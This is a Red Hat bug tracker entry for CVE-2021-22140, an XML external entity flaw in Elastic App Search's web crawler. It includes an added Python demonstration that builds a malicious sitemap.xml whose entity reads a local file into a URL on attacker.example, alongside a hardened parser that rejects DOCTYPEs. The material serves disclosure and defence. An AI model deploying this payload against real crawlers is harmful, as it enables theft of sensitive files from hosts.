Bug 1955289 (CVE-2021-22140)

Summary: CVE-2021-22140 Elastic App Search: App Search XML External Entity Injection
Product: [Other] Security Response
Reporter: Guilherme de Almeida Suckevicz <gsuckevi>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED NOTABUG
Severity: high
Priority: high
Version: unspecified
Keywords: Security
Hardware: All
OS: Linux
Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
A flaw was found in Elastic Enterprise Search. An attacker, using an XML External Entity Injection (XXE) issue in the App Search web crawler, could craft a malicious sitemap.xml allowing the crawler to traverse the filesystem of the host running the instance and obtain sensitive files. The highest threat from this vulnerability is to data confidentiality.
Last Closed: 2021-05-04 10:46:43 UTC
Bug Blocks: 1955290
CC: aileenc, akoufoud, alazarot, almorale, anstephe, aos-bugs, apevec, bdettelb, bibryam, bmontgom, chazlett, dbecker, dbruno, drieden, eparis, etirelli, ggaughan, gmalinko, gvarsami, hbraun, ibek, janstey, jburrell, jcantril, jcoleman, jjoyce, jochrist, jokerman, jschluet, jstastny, jwendell, jwon, kconner, krathod, kverlaen, ldimaggi, lhh, lpeer, mburns, mmagr, mnovotny, nstielau, nwallace, pantinor, piotr1212, pjindal, rcernich, rrajasek, rwagner, sclewis, sd-operator-metering, slinaber, sponnaga, steve.traylen, tcunning, tflannag, tkirby, tomckay, twalsh, tzimanyi

Description Guilherme de Almeida Suckevicz 2021-04-29 19:39:30 UTC
An XML External Entity Injection issue (XXE) was found in the App Search web crawler beta feature. Using this vector, an attacker whose website is being crawled by App Search could craft a malicious sitemap.xml to traverse the filesystem of the host running the instance and obtain sensitive files.

Reference:
https://discuss.elastic.co/t/7-12-1-security-update/271433
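The mechanism described above, as an added illustration that is not code from Elastic, from the advisory, or from this report: a crawler reads the sitemap.xml of a site it has been pointed at, and if its XML parser resolves external general entities, a DOCTYPE in that sitemap can pull a local file off the crawler host into the parsed text (here, into a <loc> URL the crawler would then request). Python's xml.sax is used here purely as a stand-in for whatever parser the App Search crawler used (the advisory does not say), the sitemap is constructed, and a temporary file stands in for a sensitive host file. Function names are this example's own. The hardened variant disables external entity resolution and additionally refuses any sitemap that carries a DOCTYPE, which is the check a crawler that only ever needs plain sitemap markup should make.

```python
"""Added example: XXE through a crawled sitemap.xml, and a hardened parser.

Not Elastic's code. xml.sax stands in for the crawler's real parser; the
sitemap and the "secret" file are constructed for the demonstration.
"""
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             property_lexical_handler)


class DTDForbidden(ValueError):
    """Raised by the hardened parser as soon as a DOCTYPE is seen."""


class LocCollector(ContentHandler):
    """Collects the text of every <loc>, as a crawler building its URL frontier would."""

    def __init__(self):
        super().__init__()
        self.locs = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "loc":
            self._buf = []

    def characters(self, content):
        # Text may arrive in several chunks, including the expanded entity.
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "loc" and self._buf is not None:
            self.locs.append("".join(self._buf).strip())
            self._buf = None


class RejectDTD:
    """Lexical handler: abort before any entity declaration can take effect."""

    def startDTD(self, name, public_id, system_id):
        raise DTDForbidden("DOCTYPE not allowed in sitemap.xml")

    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


def parse_sitemap_vulnerable(xml_bytes):
    """Parser with external general entities enabled: the file is read and leaked."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)  # the dangerous setting
    handler = LocCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.locs


def parse_sitemap_hardened(xml_bytes):
    """No external entities, and any DOCTYPE aborts the parse with DTDForbidden."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setProperty(property_lexical_handler, RejectDTD())
    handler = LocCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.locs


def build_malicious_sitemap(target_path):
    """Constructed attacker sitemap: the entity body is a file on the crawler host."""
    uri = Path(target_path).resolve().as_uri()  # e.g. file:///tmp/....txt
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE urlset [
  <!ENTITY xxe SYSTEM "{uri}">
]>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url><loc>https://attacker.example/leak?d=&xxe;</loc></url>
</urlset>
""".encode()


def demo():
    """Returns (urls seen by the vulnerable parser, whether the hardened one refused)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("TOP-SECRET-TOKEN-12345")  # stands in for a sensitive host file
        secret_path = f.name
    try:
        sitemap = build_malicious_sitemap(secret_path)
        leaked = parse_sitemap_vulnerable(sitemap)
        try:
            parse_sitemap_hardened(sitemap)
            blocked = False
        except DTDForbidden:
            blocked = True
        return leaked, blocked
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    urls, refused = demo()
    print("vulnerable parser would crawl:", urls)
    print("hardened parser refused the sitemap:", refused)
```

In the vulnerable path the secret ends up inside a URL the crawler would fetch next, which is exactly how an attacker on the crawled site collects it. Rejecting the DOCTYPE outright, rather than only disabling entity resolution, is the simpler check for a sitemap consumer because the sitemap format never legitimately needs one.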

Comment 2 Anten Skrabec 2021-05-01 01:59:16 UTC
servicemesh-grafana includes neither elasticsearch nor the affected code, only connectors that talk to servicemesh.

Comment 3 Eric Christensen 2021-05-03 13:25:50 UTC
External References:

https://discuss.elastic.co/t/7-12-1-security-update/271433

Comment 4 Product Security DevOps Team 2021-05-04 10:46:43 UTC
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2021-22140

Comment 5 Przemyslaw Roguski 2021-05-04 15:46:55 UTC
Statement:

This vulnerability only affects the 'App Search web crawler beta feature' for Elastic Enterprise Search, as noted in the Elastic.co advisory [1]. That feature is not available in the upstream elasticsearch open source namespace on GitHub [2].

[1] https://discuss.elastic.co/t/7-12-1-security-update/271433
[2] https://github.com/elastic